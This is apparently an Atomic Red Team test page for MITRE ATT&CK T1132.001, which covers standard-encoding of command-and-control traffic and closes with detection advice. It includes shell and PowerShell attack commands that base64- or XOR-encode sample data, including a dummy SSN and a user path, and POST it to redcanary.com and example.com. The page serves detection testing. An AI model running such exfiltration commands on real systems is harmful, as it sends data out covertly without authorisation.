Ctrl+K

T1132.001 - Standard Encoding

T1132.001 - Standard Encoding#

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

Atomic Tests#

Atomic Test #1 - Base64 Encoded data.Utilizing a common technique for posting base64 encoded data.#

Supported Platforms: macos, linux#### Attack Commands: Run with sh

echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.redcanary.com

Invoke-AtomicTest T1132.001 -TestNumbers 1

Atomic Test #2 - Base64 Encoded data (freebsd)#

Utilizing a common technique for posting base64 encoded data.

Supported Platforms: linux

Dependencies: Run with sh!#

Description: Requires curl#
Check Prereq Commands:#
if [ -x "$(command -v curl)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:#
pkg install -y curl

Invoke-AtomicTest T1132.001 -TestNumbers 2 -GetPreReqs

Attack Commands: Run with sh#

echo -n 111-11-1111 | b64encode -r -
curl -XPOST MTExLTExLTExMTE=.redcanary.com

Invoke-AtomicTest T1132.001 -TestNumbers 2

Atomic Test #3 - XOR Encoded data.XOR encodes the data with a XOR key.#

Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f Supported Platforms: windows#### Attack Commands: Run with powershell

$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext =  @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive

Invoke-AtomicTest T1132.001 -TestNumbers 3

Detection#

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)

Contents